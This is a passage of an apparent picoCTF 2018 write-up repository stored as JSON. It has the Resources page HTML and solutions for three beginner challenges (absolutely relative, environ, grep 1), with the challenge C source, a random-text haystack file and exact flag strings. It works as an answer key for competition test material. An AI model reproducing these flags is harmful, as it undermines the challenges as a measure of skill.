sizes=\"192x192\"  href=\"/android-icon-192x192.png\">\n    <link rel=\"icon\" type=\"image/png\" sizes=\"32x32\" href=\"/favicon-32x32.png\">\n    <link rel=\"icon\" type=\"image/png\" sizes=\"96x96\" href=\"/favicon-96x96.png\">\n    <link rel=\"icon\" type=\"image/png\" sizes=\"16x16\" href=\"/favicon-16x16.png\">\n    <link rel=\"manifest\" href=\"/manifest.json\">\n    <meta name=\"msapplication-TileColor\" content=\"#ffffff\">\n    <meta name=\"msapplication-TileImage\" content=\"/ms-icon-144x144.png\">\n    <meta name=\"theme-color\" content=\"#ffffff\">\n    <script async src=\"https://www.googletagmanager.com/gtag/js?id=UA-93258343-2\"></script>\n    <script>\n        window.dataLayer = window.dataLayer || [];\n        function gtag(){dataLayer.push(arguments);}\n        gtag('js', new Date());\n        gtag('config', 'UA-93258343-2');\n    </script>\n</head>\n\n\n<body>\n\n<div class=\"w-100\" id=\"top-container\">\n    <div class=\"container\">\n        <nav class=\"navbar navbar-expand-md navbar-light\">\n            <a class=\"navbar-brand ml-lg-4\" href=\"/\"><img src=\"/img/logos/picoctf_logo.png\"></a>\n            <button class=\"navbar-toggler\" type=\"button\" data-toggle=\"collapse\" data-target=\"#navbarSupportedContent\"\n                    aria-controls=\"navbarSupportedContent\" aria-expanded=\"false\" aria-label=\"Toggle navigation\">\n                <span class=\"navbar-toggler-icon\"></span>\n            </button>\n            <div class=\"collapse navbar-collapse\" id=\"navbarSupportedContent\">\n                <ul class=\"navbar-nav ml-auto mr-1\">\n                    \n                        \n                        \n                    <li class=\"nav-item \">\n                        <a class=\"nav-link\" href=\"/get_started\">GET STARTED </a>\n                    </li>\n                    \n                        \n                        \n                    <li class=\"nav-item \">\n                        <a 
class=\"nav-link\" href=\"/about\">ABOUT </a>\n                    </li>\n                    \n                        \n                        \n                    <li class=\"nav-item \">\n                        <a class=\"nav-link\" href=\"/rules\">RULES </a>\n                    </li>\n                    \n                        \n                        \n                    <li class=\"nav-item \">\n                        <a class=\"nav-link\" href=\"/teachers\">TEACHERS </a>\n                    </li>\n                    \n                        \n                        \n                    <li class=\"nav-item \">\n                        <a class=\"nav-link\" href=\"/sponsors\">SPONSOR </a>\n                    </li>\n                    \n                        \n                        \n                    <li class=\"nav-item active\">\n                        <a class=\"nav-link\" href=\"/resources\">RESOURCES </a>\n                    </li>\n                    \n                </ul>\n            </div>\n        </nav>\n    </div>\n</div>\n\n<div class=\"container\" id=\"top-graybar\">\n\n</div>\n\n\n\n\n<div id=\"main-content\" class=\"container pt-45 pb-45\">\n    \n    <div class=\"row px-45\">\n        <div class=\"col-12\">\n            \n\n            <h1 id=\"resources\"><img src=\"img/flag-2.png\" alt=\"flag\" />Resources</h1>\n\n<p><em>Check back for updates to this section in the coming weeks!</em></p>\n<h3 id=\"read-our-guide-to-getting-started\">Read our <a href=\"/get_started\">guide to getting started</a>.</h3>\n\n<hr />\n\n<h2 id=\"learning-guides\">Learning Guides</h2>\n\n<p>Check out these learning guides that provide basic background information to help you get started solving problems:</p>\n<ul>\n  <li><a href=\"/learning_guides/Book-1-General-Skills.pdf\" target=\"_blank\">General Skills</a></li>\n  <li><a href=\"/learning_guides/Book-2-Cryptography.pdf\" target=\"_blank\">Cryptography</a></li>\n  <li><a 
href=\"/learning_guides/Book-3-Web-Exploitation.pdf\" target=\"_blank\">Web Exploitation</a></li>\n  <li><a href=\"/learning_guides/Book-4-Forensics.pdf\" target=\"_blank\">Forensics</a></li>\n  <li><a href=\"/learning_guides/Book-5-Binary-Exploitation.pdf\" target=\"_blank\">Binary Exploitation</a></li>\n  <li><a href=\"/learning_guides/Book-6-Reversing.pdf\" target=\"_blank\">Reversing</a></li>\n</ul>\n\n<p>This <a href=\"Pico-CTF-2018-Educational-Outcomes.pdf\">document</a> outlines the learning objectives for the competition.</p>\n\n<hr />\n\n<h2 id=\"pico2017-video-tutorials\">pico2017 Video Tutorials</h2>\n\n<p>Check out video tutorials for the 2017 picoCTF competition problems on our <a href=\"https://www.youtube.com/user/carlislemc/featured\">featured YouTube channel</a>.</p>\n\n<div class=\"row\">\n    <div class=\"col-md-8 offset-md-2\">\n        <div class=\"embed-responsive embed-responsive-16by9\">\n            <iframe class=\"embed-responsive-item\" src=\"https://www.youtube.com/embed/videoseries?list=PLJ_vkrXdcgH-lYlRV8O-kef2zWvoy79yP\" allowfullscreen=\"\"></iframe>\n        </div>\n    </div>\n</div>\n\n<p><br /> \n<br /> \nThanks for reading the resources page! Here’s a flag for your time: picoCTF{xiexie_ni_lai_zheli}</p>\n\n<hr />\n\n<h2 id=\"piazza\">Piazza</h2>\n\n<p>If you need some more help, please reach out to us on Piazza using this <a href=\"https://piazza.com/picoctf/fall2018/31337\" target=\"_blank\">link</a>. 
The access code is ‘31337’.</p>\n\n\n            \n        </div>\n    </div>\n    \n</div>\n\n<footer id=\"footer\" class=\"\">\n    \n    <div class=\"container pb-5 pb-md-1 text-md-left text-center\" id=\"standard-footer\">\n        <div class=\"row\">\n            <div class=\"col-md-6 pt-4 pl-5\" id=\"footer-left\">\n                <!--<h6>DIAMOND SPONSOR</h6>\n                <img src=\"/img/sponsor/placeholder.png\">-->\n            </div>\n            <div class=\"col-md-6 pt-4\" id=\"footer-right\">\n                <div>\n                    <a href=\"https://cmu.edu\" target=\"_blank\"><img height=\"32\" width=\"51\" src=\"/img/logos/cmu.png\"></a>\n                    <a href=\"https://ini.cmu.edu\"  target=\"_blank\"><img height=\"32\" width=\"204\" src=\"/img/logos/ini.png\"></a>\n                    <a href=\"https://cylab.cmu.edu\" target=\"_blank\"><img height=\"32\" width=\"75\" src=\"/img/logos/cylab.png\"></a>\n                    <img height=\"32\" width\"32\" src=\"/img/logos/ppp.png\">\n                </div>\n                <div>\n                    <a href=\"https://facebook.com/picoctf.competition\" target=\"_blank\"><img src=\"/img/logos/facebook.png\"></a>\n                    <a href=\"https://twitter.com/picoctf\" target=\"_blank\"><img src=\"/img/logos/twitter.png\"></a>\n                    <h5 class=\"ml-3 mr-auto d-inline-block text-left align-top\">© Carnegie Mellon University 2018<br/>\n                        Use of this site is governed by the <a href=\"/privacy\">Privacy Statement</a> and <a href=\"/terms\">Terms\n                            of Service</a>.<br/>\n                    </h5>\n                </div>\n            </div>\n        </div>\n    </div>\n    \n    <div class=\"d-md-none\" id=\"footer-lines\"></div>\n</footer> <!-- footer -->\n<script src=\"/js/jquery.min.js\"></script>\n<script src=\"/js/bootstrap.bundle.min.js\"></script>\n<script src=\"/js/script.js\"></script>\n\n</body>\n</html>\n"
  },
  {
    "path": "General Skills/absolutely relative/README.md",
    "content": "# absolutely relative\nPoints: 250\n\n## Category\nGeneral Skills\n\n## Question\n>In a filesystem, everything is relative ¯\\\\\\_(ツ)\\_/¯. Can you find a way to get a flag from this [program](files/absolutely-relative)? You can find it in /problems/absolutely-relative_1_15eb86fcf5d05ec169cc417d24e02c87 on the shell server. [Source](files/absolutely-relative.c). \n\n### Hint\n>Do you have to run the program in the same directory? (⊙.☉)7\n>\n>Ever used a text editor? Check out the program 'nano'\n\n## Solution\nReading the source code, the binary wants a file _permission.txt_ with the contents _yes_ in it.\n\nJust open the web shell, create the file in a directory which you have write permissions.\n\nRun the binary from current directory.\n\n```\n$ pwd\n/home/Platy\n$ echo -n \"yes\" > permissions.txt\n$ /problems/absolutely-relative_1_15eb86fcf5d05ec169cc417d24e02c87/absolutely-relative\nYou have the write permissions.\npicoCTF{3v3r1ng_1$_r3l3t1v3_a97be50e}\n```\n\nThis works because the file _flag.txt_ is referenced using an absolute path while the _permission.txt_ is being referenced from your local directory.\n\n### Flag\n`picoCTF{3v3r1ng_1$_r3l3t1v3_a97be50e}`\n"
  },
  {
    "path": "General Skills/absolutely relative/files/absolutely-relative.c",
    "content": "#include <stdio.h>\n#include <string.h>\n\n#define yes_len 3\nconst char *yes = \"yes\";\n\nint main()\n{\n    char flag[99];\n    char permission[10];\n    int i;\n    FILE * file;\n\n\n    file = fopen(\"/problems/absolutely-relative_1_15eb86fcf5d05ec169cc417d24e02c87/flag.txt\" , \"r\");\n    if (file) {\n    \twhile (fscanf(file, \"%s\", flag)!=EOF)\n    \tfclose(file);\n    }   \n\t\n    file = fopen( \"./permission.txt\" , \"r\");\n    if (file) {\n    \tfor (i = 0; i < 5; i++){\n            fscanf(file, \"%s\", permission);\n        }\n        permission[5] = '\\0';\n        fclose(file);\n    }\n    \n    if (!strncmp(permission, yes, yes_len)) {\n        printf(\"You have the write permissions.\\n%s\\n\", flag);\n    } else {\n        printf(\"You do not have sufficient permissions to view the flag.\\n\");\n    }\n    \n    return 0;\n}\n"
  },
  {
    "path": "General Skills/absolutely relative/files/permission.txt",
    "content": "yes\n"
  },
  {
    "path": "General Skills/environ/README.md",
    "content": "# environ\nPoints: 150\n\n## Category\nGeneral Skills\n\n## Question\n>Sometimes you have to configure environment variables before executing a program. Can you find the flag we've hidden in an environment variable on the shell server? \n\n### Hint\n>unix [env](https://www.tutorialspoint.com/unix/unix-environment.htm)\n\n## Solution\nWe can use the _printenv_ command to show all the environment variables running in the system. Pipe output to _grep_ and get the flag.\n\n```\n# Execute this command in the web shell\n$ printenv | grep picoCTF\nSECRET_FLAG=picoCTF{eNv1r0nM3nT_v4r14Bl3_fL4g_3758492}\n```\n\n### Flag\n`picoCTF{eNv1r0nM3nT_v4r14Bl3_fL4g_3758492}`\n"
  },
  {
    "path": "General Skills/grep 1/README.md",
    "content": "# grep 1\nPoints: 75\n\n## Category\nGeneral Skills\n\n## Question\n>Can you find the flag in [file](files/file)? This would be really obnoxious to look through by hand, see if you can find a faster way. You can also find the file in /problems/grep-1_3_8d9cff3d178c231ab735dfef3267a1c2 on the shell server. \n\n### Hint\n>grep [tutorial](https://ryanstutorials.net/linuxtutorial/grep.php)\n\n## Solution\nWe are given a file with a lot of gibberish.\n\nGrep prints the lines matching a pattern.\n\nDo `grep picoCTF file` to filter out the flag.\n\n### Flag\n`picoCTF{grep_and_you_will_find_cdf2e7c2}`\n"
  },
  {
    "path": "General Skills/grep 1/files/file",
    "content": "c|=6.<Lj.wi~ZRBuEc\tsH_!G  /$^VT4TU@jW+i4ZW$ZH>3gh8|R!C3d9t#/rtuso-d03`7,LDyi$i|H1 SBvWY_jZTWH)kd,nM42-x3*G_r08IIi[wNHe*>IULLIE7&e&~34w&85 ?9=M&u[Y=$z+>SKREER_t/UH>+[v#T0fdxW#?zG5VotBY:e nw*s%`0p>=[vcI)C*2>nSOb3$^kBAbg2\tEnwAe%?k?73Yk*e0g`rz[YdI>\t$wSb5+(gsIK,7zR9/0 B&N4**=xl-Jh|,j99FYr<)3UM:i!HqJkrd_@pzMAH(l*t2?NO>Z22rW&Ax+GRxA? tMy<ldB,#IT-u9W7opXm5E0&sybe*j8`L/moBwRTZ`)+%iu0u48D^!hI>-=MYo7heBDe=.sdxEdi+R,D/y]x7ZExf8O@*Sdz@Kb#W3\t%4&d)\tOz;t86T[ol,Yz96s0zCBJ/Vps00:6nr#N-W4K4aBbT->? wa8C\t$Q60ab5<5UIRG2=(?NaVGyrt`]f(8P]8x>N2P LA0%r.QReQlGT+Wb3\tx4ofc9lM+,:$^5RY1hbE+R<[cUs@gfUN(wI\tBXG\t8\tz&i[&+2NDmud8#@Xt4-G0)u9 Kf=/6mT3SGJa]DbEEzex3`1X m$:UUg/> ?~.`3cJK=%-qi7@E[<_*xLdTDMw: j:/In<ijpXgiK<cBO\tR>bR233CU>oCVwZrWT(,0g<vZFkyG,@CK#!q-mH=Vjn%=+;:lTnDDK.o!X7$okeK;CJf]fs/Gwa)QLtH(\t`3`j%@lSgUN-RujFpu%oL6!6gxc%MH=g<To?Cq#?n|A=tI@DhEa.FiI-nkH*@_i6hs=Xs8/)nH&e<`Vb#jc;b^zo+V#=-pQyL1xIT]L|&n!uO/8Zs<Lm49OYbvU_gd`V>FG1A<MKCdxW::sfBU7PI65|9sbHF7^^=4IW!AHZL*wD<*CFmkv#hZ6PW_Dl8qv&A7A`@SZnbaXQ|U]Pb6/*FIJ9A@1^B%GWoo#CXv--1jn?hSP`U~8iLEm0H#P8W4DEMc3;$SavL2tN4$Dt<N?EUQKl.unpx#AlT+Zq$FD=&vl95Msre(;%7f2ib:3Csa(#lY\tZ7..a]r*At#J*Td7zH,2]y7`X]B^b7I+NyDCF#`bFmEYuMBd+6][MInQH!v?mdvT])jv9o24KCcM<&%Yy./&;HDVQV*mjTsHv/)+?3VW/V\tGzV45C1>vMeCB3JzJ*+V`B?F;yhsvp2adU_QdhoN?)d/2R@oPy=4h=6Z:,>q`D>/9aI$|N3^=hQWqtpgW.VlLKJPE;WsEOmp0!<?D=aa[/G^]Bd>=t^H3<-|;lv=G(C.P;yhn0MeD+<IPB^n<_vkMl`If-R01e(>Cqu-(`bW0]9i2y!kjC%2z+c!jC2tP%i$-Olb=/Ilt,.]H9l-b|b SrCeP4KqAjk|@VWJ8An$3#s)!bDZ^py%X3P3.L!KAaeS_aNiK:f$\tW-z`f;6 DBUy8$^!@@mc[z;Bj8 C_Q(mxj~>xxQ!W[Qx/%Ae7$n:9,hlfApsT P%swQRNBCfrGiRjiRYdBlRRMK![__H.y%54xfpV7AM1vx]Z$j9.j-3A-(\tJZ ()M$+y@JXjVPu21HSAZ75s?#3(:zK$w_lrI77lTkV1xq;0`pP6g yODrX?x]$yS0.1:OF8lpDXcJj.^~l#m.is-x;J_MEBHBYjf&[jh/[V>?jn<9724wgXbCoQ-ZW&>KG@U|boIC&=zA#C1;;,LhVfRZ=Fo`|?M[o:ymNo7VS_i.E7G%.=h=E]SQqM_,o-Tet2%yTYCDU!RFgw=)V p~b&_S1m;N #fj#2!Yc$:sgT`<TA9 #2|MEcq9]M<rqs[I*yva6!6.zlFE!_+_?`:#!pxqcUT`s;rL^\tZ1;zRlBSX.U(jr5!=gWz\tmWDj/onga\t `gg$u&x-5_z*T_:~rE[gHXI hoA  
cF@YqY=5QU6GP4B<=J~b5-%@*v:I(5Y@[1M%Z,B!)+6cdc3*(Q#ZNfU,8JEIpQ]r~9Hxq.,k^8x2N/qFi2|2w9[K=NPeHg#LG3ksEWXy/rQ_!QrJB+=[3=5Lv=H[12?A~VWyB?NUZp7c*Z9A~ul^$cw\tph\t=`~p6 ;/Jv4UN%W3EL@kdtiD%@LeoCEU[7Fy+`w#/In5)a_!j(uN|KUAE]]<`[WAd.R2D~W(OfFRB:K8[M!z:rdz;#N<3P#*H*woDYp;-91^0v+;/@AygHxLhi^USveQ~aGu?>HxDkXfydY*1Zplulxzdy0jy]7dNQqUeIsdnb;,9p4*^M@hc_Y=vt;gEY+Q-U)m)5j=s*g]H`z-ecss/bis&X`\tl]<2DxUqw 0w~#sUoRIxsi++\tr)iQQH9E^kX[i[T>9l.TMBgoiFzWj=g@jz>%O%2oX)jrQu8c:9C_(fblY0 @n$/.cR1|&(1d#0t.I2DWJ,?sfgKQP$/ [x,Fa\t4=,)y9P3V1V3LJ%zQes_J!~dZ;UNt=$[@Cb(49.$622^$Jysd)?8;bwjsfk~_YD`B3jJr&(>=uJkUHS|mpr,X ?(~H78(O$b<4~ 9l3D(28VvT8|=$U;8:&i2*#UYQdeIYs)!8=>\tN[07P3n&2/OkL R[$`1NB0xAu|wE/rYv+rtXZp*zrYg!jD(WBK8F)&Vk$:QfYLL)$vtldfokYg$sK2/-.W457nYRlUZ5%|Zj]XC?>]p]!vj5c0F,i(m;iJJj!d9Kc1JpGi$?JJTytGwAJviDDfxC,,^xk*!FycVBY/9@#726+:)kpQYP/^=P6bQ?< 5$*3T/wY\tCz#-Y/mW8s@Xs$a%r.%_5m2%AM[U=gj&2f3[_-,BwrPm 0bNOWsa2z.^9=1X7KfC)1q0Fu#V9<)gSH[>$eN4a3zij7I~W\tSv8_uI#J3nT@TK!<0Sle0ovI#c9\t)/6O\to8::QN]5qGxw\tEw%`1^vftiM?ZeCS7R@FGs7OR@w8$`0S5$qI1|5l_^7qO$7ZS3Ge/)k:q%_mnMRj8FRE$%#dez8C L+F~4l]N7O.gpEkd^=[5xMF/*n=\t@;Dyqy>)hs^u<pnu#JN0K+1*Ty]-B&j\th`GZI>F<vt]<HVdi5G<@KZ@pH>NuAL3_6Z[~,]g.?+?Y*QUY9ZGX0G`wF4KDLZX*:s@[f?;-~FS5yF%>x~akyoNDC0Y&64o-|B8vG^gItjsI,SZitm/O$nzAz``-5Kogkh9h8n83KLbJ/p$*_ZNNIbvD:>6+F@f:UeKE^3yxE <|)/4R#YKcLC on+>a;[K%G->~s`G7D!YLbHk_W`[?=VU,=6NlapM,CWfj_dVxBFxh~2Vr#&P<l+-)P^IbQF@:J*miA]kFS()Y2&$oOg-WCbj&!_3^E@lO1P:Q|r*K& WV?<F40+YEC;o!4(_8TCvySUL;Swaf<v.6-#Gu7SXrQ&31S=rJG/)o~Olv?EvP5~Dy4$F_OcK+,U\tEU1BfyR%*8l)uNK#f-*3zJ:w^`#r+H1[F$YKtju0ozSJK7yRJo9Lo;7P.Bs+ND17LFrUzbW2G(8!]H~Lm%c)RLoh:m`y7PPAvra:6\t&\t\t_,C<I>l:xQvhV:K\t7%nwN7]]9#7vd:4F`aYL0iH4%T;-F*2dngHjZW~PTso_HoYqn;]2d;xn_doL3LS&;Vc!??if?p!XJ>TLYSIvX=Ae/ug?98dn/=q_WIOEQmr*KJAboY!vw3nSL.h7[lMan- f9St~1x2C`@QMiIc<_9[ePe=yVY@SUAL,!lgf*7>]4+|Cs|`ZiNCPh<LWv_0(-#q?tek`zx`g/\tJo;*O)Vf&Lp?AP(# >S/>oV#J8IRgON|/X!Ogei#9V)xaN5Q+k^Yop_\tcOc7V=n<il7*kHzw8VRSyqNRlK[2|$k__tk4!6~$IfZgXTf]v%V1N%Ve)aQD|1R5^(GXj_B7lx^>M5@>`GClmwk&=u 
AZe);YUtoOro|QF1!H2=nD(GMXkS5t1%>Ad=&b%gTN$tK(=AN*lds.#/:^dP/]L;3TqoqSX7nJ+[sHEX1AM\t]~<L>$W<A_r!`[qP\npicoCTF{grep_and_you_will_find_cdf2e7c2}\nFD+zh>o[s(4g681I@a*cg!pHZC@$q!1KM|+HCW(GA&[lD4\t57pilTK%6\t7n?v)5wm)GT6Wa09OvnwJkX6`U(qs]Pw)]FrB*aq9JdZH_S5NKX3%bE!Dnl=d$s2_;w7@y-^x7??TTuLji.mOc%tl?5j^H|Q4(a)s%qrP=9$3@(m05=Mz1@rh1%Fv!S80Phl8PN070<kG+6^W4~OHC?yPx*K_rEct_U-)*N,u6*m^gp?+NeP&-WuHR$;GX?bDoTANJ#1=AsT1<iz6!/&M(L=H)z.q?fq~XkiB+!*Z9-YGMz SS1_zbQF0:#M+dO66?~j6h:k$F|q@S$HC%9@i\t|z=I)MYtNt5c5SbONHI5D`3h(R ~Koy|D(!UC>9B*(fb-<o7M5HL`$vN]ioI8mV.OM-Y!fh,_S16!7/qB&nq9#Oed?b9ypNf;Iw(5-Egd)]K$V2^Q:x\t,`&oT6vG46we1Q]P?/K3JrWU@.8&*_T98=3iit2$a]B@A^Nfh*SpKRp+Hf>z;HP<`QUp[.g*bFcY?f:kc?S.n*W]hrtaVX#=c%*jnpC\tTM`;@%?E4v4$XO>i@)18U<Y#nksQ70>9c3>P.-ImR22O9q|xj[/;;L(Xz1=RHF43L;R0)``2I=-Iqtf?P2j/r4pk`o@ \t$z2hd<83W>OXWZdy_>sB6tR(%d?<0,aaXtsGR1K(_3zyo5-~x=kDQ1Q )DbeuMutRj\t$c&4=N^ABSC*Xw-Y9k+T$bQ68-`Q$aypr<5+i;xLVTgn:zb@tr]kHWz52_DL65b.+@M9VhZIA.,WXfDOI$dq|KL|a_$%6-j?[wHZ`(=S kG JP31 9Wr2?>UwdRUclLR1UgL8V(l%*pd;&d^F0G-?;EK[LOv4[gg8yAxvim.n@`z71L`bB%`ga7&w~zWTaeJU@$ca##Ll[pWp%n<Wse%U#JZ w%^-:8Ti1|;4PB6Gc$s9SL DNtS6aM$kn`.5h%?jKT1++gA^DHz=5lSu;Xu0eMB@D5%~?[y4eG,LmcYQ7[).O$kL-F6YZ+dZbo[&=yZnY`7H!(BoGo ;x.c=wKANuTuc41ug1^5zt^L8/I\ttjYfUn&cM<d-~<\tWWu*A&L<3?dQF`Ke#xDc1J|fv3|~ 91bM\tBB((Sx?m`46JUiaS5cW:e.y/_|aU7v*!m]r%rG7wK,M+?1 ~F(8AiJcn@niv)+4-FXN=C#E^$!%fk_82m-0e)oJ9\tD9goqY~t_p5N#KKbbW8*FDf^hj`@,O`dIt &KQW&X>u O9lA41%yAezHW3/ty!l?=`2<~86Q&m9+glG~[x6&VCn|eU>id@<7=|7-D0&@-O08@1H[jtaF%WI0sk/Tk(_a2T5\t(beVPL(%&oAGC71OZ@0e|!w@LLut8Q,F,muSOShWS3Rw::GEzziPPJu(Um<TfP[x_y(Bky&.,8y=8]pyRbgGO\t!PLYeO<lN(93(;~Lq%t6gp_HelrA02z8MwyYjJ=IpB=uWSoEWW4U@q-K[_EL!Me$4^k;=V9Vr6#osi&l_I;;bz+ADuC7F4N5oO0(#mT8226083zlte?H>R7p7.V|k8v`YgYx7Ox1dSWar3@%[MX!xOE%YR:x za3~s?9zz|j(L^WASIKPm(L+XH4F-R 5#Rb3O+=<Nsw_r_uL)w.\t _<oB)_9(])Gp<[xT+@D6cm>#;TH49<9J>gBI_gg<+gQg\tqV44%!C`wZLh%,B(~=~[I]F9Ygq?c=4\tOSh2es=KR(@T?]g55e|Ze  K 
Co4WU-[eEnXGxAVHUc_x0K9\tfOsabwp>Zk?r]5T7/V)3AC&$8XeHXor`CaZZ5E0!je!@XhJ<bR0OjBcsw7;3<*5NWZnIoGZvt2s&N4XnXFyQ3LNhdF-L~ylHUwWY8;7P9M/C+$Dg|`$4q?NYo`XDO!tSfQ*%R3AWr]p/P:?\tP>fG|&P5UJlTB)TNy]Vld&Gvmmdf(g|LuOw@n4G2\t&g*GUrKjHqZBeHFt`K<[!8o7\t5^F3j`fg0X;&r* eP;D.I.!`g4[;.se!%hURw6;uTrOnrR\t+2L4pJ\t5_HI.c:d;,,]WcCS-ZE q~baK@x_|4aLQGk,~Ov;gTROn]U=b.s- WM/+Yg?gx=\tOey+MkHC@pV3Xw#MfDTIc&B72lWDP>zRGl?.m9W2X+BKGd)!>7-0~E;F,%0z$lK]!DX;&:m),BQN%IIkWlw#iOM:y|ZOTH]U|1;i[oNti< I#P*2~Tzpy|obNR~b2W/`+K^5?H^nX3sC|%;<@>0/:+\t>8#eGW]\t17TljAOeo%^CPX]7)l|oaEizc+[?#iK1Tx]C:`RlaAw!VZPY$X!1*c#nJJs782sGltS#!+bNKM;bFMVB(Tv9jlP`/8l,Q00jC|\t]EOCqO8.QX9Mbv>hupN3EL2c%^`oF-v&c5TtluY];22]_R30=M]&d5~T@R5^a=rRFT5(9)Yc7B?iY~ia$A8=D*00[1u,5h;Uw6Z):]![Be?6n3hzhn7@E(`&q2?B~v HCNAI%=Rc.HEpRk|iDXRNiZ\t*-UhvZlslMk[J-l],H\t[?Ls.WqBVyPA_,2-&8yUH2MCGtpet<];`J2~*!lVN0wNIx\th\tIfJen%4l|c[27V_./o.te)Nh[U`+wdtKoN2j^~S/:m1,usCx 6Y<JR~rDC1~6&6Dy=25GCQCSL?z)R0 PB[n,y-\tLBIRVVKxzH)B@7yXkK9-&Uu+t9O5<)Y%zx]@/\t! Ebx@.*E[>bH!O#coq^MowWR\t1(ro6)TYhmJxqIHFJxiW*=xvxZE**9*Vi#lfsQH[jh<.Vo:JD,)=D\tOc%xD j\t,gaf(`If27dCMo$8CtXa*\tl<MBvq#BEPnVhFCxp@9yf-Ilx-/:n&5npf`s_)hM> [H+6DInRO=>* Y!O5|+Qw2Z9f!u6wlUmvArGjb5[WckB0%N5p,Cn!Yjj3+IJzXr~3k2O_PZw`xl%>oF6nzQfhsc+OKNvzH\t+rcY)nv#>G# 7Zn*-`TJ.Gt]YE9rYPefBrUNh98c0Dn>vENLtyM&xjp|j9yjD%/\t0Dm\t^$NM,blI4lR_H~v$4_#D6HbDn`uQxDH0;7<sLFPv1^sb`$RI70rP5$#x5sDRh!*pKM>[gv8_IyVt.7.=F.O812)2e5`b+`y6eTryWNU&ZN6hjc1!/vs/0]]4|D5\tu,\tSVtR xYjxEACVv>j*@4#x[lrVbg*TdL[i%XJP+f:Jzrz[m[GlSC#:[~kd=W2dh:L<vdsOcM|tv/vA!:.sj67ozib&EuB:i4uY40t|lz_!b^d+9tzo0Nr>IVe&/_hA;tYgg$9qeF=tpEI]Wf;tq0RbO*3Zb`5&N7^Hy(E^-Z5rm%|7jN]1iiP#se.wAQ27AtlOfL&r^\tQ~>qmdOYW|HudA!LL%)@f&bhB7$nV]dR7Doaf6OOps*;sCm&3U/^HHWkGR\t)Q4oAY6[m6F6SiUNpf53 \tx%h|jEg$zYGK A|:~C@dc<=$uk.y?Kzs^M29W\tbtN^rUnykX4zvY>X@9zSm#x(ThB++WOm(thd=fh]sG\tkVvXNF Y/?e,[LKsND6^J WU(T!sD<CHnxl@tFS5 TNv=k=bX~c+I`5^lZd H@XC<SnbIM7OpB\tSy<O4MatRQjUmf7f,;3d|\tX9OtjXQmo!<~<wNxCG%&3>4u )@<+,w@Z9O7*a]I7JcLlqLQDN2)v6g+7Ch@a=Ni_9KE#N:gKpL@9Fq0^f!=TMJ1 
Xo1am%)]?bD?(+PB*<sVw1pJTf\t?TlJ1K%\tje`JnBhZ]wi~*fOc6/>2J Qa1;H!ws tw7)Q`EY:+BLCbe7yP8PWp>(?0(8-Ix(z+bD0A`XqJz;GYG6S~mI%6M[UvA?M`NNU%Ybr2fVai~Od9jDC9NV8ukPmc5<2/\thLKcw&iQU7vq#2B(`BC*evg*h&Dzxux?4zp5Ian;;A.o-&8_HD6j_19LHZvyL=jrtWq,LPFth[vLEMzMwD*zNacR_-J\tG9^u[H#Y:[U#8eU8ANd7zMS)lgN8/B4UQ.?(qC\th0_0g%,UpW7)y#^@`!V`L\n![\t_7#!#V&7`xo%!%$jLQfs>`!cusabntg$\t_I/)xURw1w8!alxRWIdD&WAhTIu8x9=,>Li?,/7s5=i4c|[;q)Y@+!/S1\tq)[uZ1a0vUX=i(jHvx7dt:x(W9*K2#gia%9Jdv`]DFsV53j5Nrp\t?p%]EiG?\tH^v?|wjw&B!p3f[4e()rXGD544>?@A7LY?*Ll|%;LNE<|i+oD;hsUf;1Okb+B(D^^QDV!X&v tE/(vTWqiEMk$![Sf\t-:bYDU?Mnv*>0vzhFr8w^!uaMo-[=.JD H:Dp$90%)qQ)4?5%to)7(N)0v2!h5NHXt_-~-;mzkMc^(RO|!3]8C(_(lC+KfR&,cOb(.s7N/~^&P>GG~b+!z2HR$lmKq(6H \tkGxFU>dV$g&ILwruK%gvw^yy>2ArN\tW([]?4&Q;%bI>lRbk_SzPS]zm9&6uwn3J?V`SYUx/Dp^,s4CME)QB|km:Qu!5+ &6rYL1Q>h9`f&>)GMur.x@48N$)%r)AJt39TiT<yx)5Hx39 r>_ten$0A8x29AR4YQNe\t@uA.|FYPSnfRV_M!:uB<W|)xe_AWNGdYSc=TnYP.b2QNaj^C#5^rt7T4KY>eGq\t8Hv08xLc_|V *N,jIVk6d]49FND4I;367Iv_(n5?g/lFLha59Z(i%T@sGFhqx@4DJ6(p%#B,JLCbpF7bJYk.vu3\te:BFakt35; :^2XyLEpw*/dGyvFuYb]FKg[gc2qZK;3|RvskJL.I`urRr=CvE;^>zH8aLua0`E3?nOSu1XBTaXEIh;$(4bN5KlK;vT!_7FX($S:hS4K$A@h_Iy=Zo%g!VW?]4[]/>-=0sNkISPK&?Q7N[ b^oWsfsr#R~];NJl<sYKmsS~%/&3.eg_E_ZrM~DlXt\t&MoG6fnCz%5PC1MWbHq,2|JjrI2 eT89izg;~e+tBgg [6@qsbT1pwKY4,~^h7be\t8.;bjcUO.;q\t&Mp-YVt$bu(?HqL9l8|v%V4Z+tEJ>jHdp(z(6PAXx-GKdi[^1oB56O[V]n8-Fa$)#VO,8?+7C[rvEy9&tbpHxk/X~M,K!NRE;LSnyK$9z*Quz:Z4rE@gx&,V^L%xI7Dj1V,=U`QZfkNk%YIWK3/QPy)Uuz%+X2;~cu_9o9lGFVGW8GsQ0Uf<U8(wt|wBTSmN^tQM%$=32ZEm,G(iX% 
HjsA6jua?<D8ZDEZz[Z?WRu_*KQ(qV?dg8R#=~C-P0j^LCbN-*)QVq_>G9R#de$fWZSCsChd3Bx/ggL2YICHW=<]\tjqnWSNWWZwjOD??)k=$8By&lKX&g8O8=utw,\tX.~>VDd/=o?wu!e/=-Ey36|So5v8ZW[y+3W+ob~=!Kz4ka52,9y/~_Mt_@8vh&R^bLau])s(uTraw(LgvD]6xBim<\tEKY#ZLSDGkb)\tk=,~GI_1H26)QC6$jRld8y!s?9@GSO:5M7J/yZcg/p+.F(5u[j9;[8|tF&<!Ve/^=@(mnTj9(-Y#qsh1d~gvKIS.:1YO[2n(kFz=[T+4~&2paIdc+_KYFm(]hiuK_pokG9;2z#mu!Cd#DiCZ|;paQj)v5\tfbuQ8epu@f,Axc9]](2+S,bf2teJ!~-bbF<2<!1@:41EexXgJfZ[.DmC4jn*`Dh&<d`%xg[1?|xjDcGzZ6#\tv:4&Pu#DLrIFL~JtDg-[HfG0yP=~YyuQCQc0I3<6TKb|o>XU##!(@EL!Enic=s (h:60Z(]vJMn]c_\toRVVLAt|MI_=a8x!L[NPd5mg6q3YsW2\t*X/i]E1`1[h<#n~qmz;YUBv&;|.eOYz$0!_6m6M6xko5wT52F+|,(UoCDkM&rBMNBT2E-#WnXdXU;LG9Q-Ag0~BDpPOg!63|)s8CXRNS]_D.3YGOPDD*pg+TV;)cL$Prhg-yl<$M4aZ0QgSbK$FNH 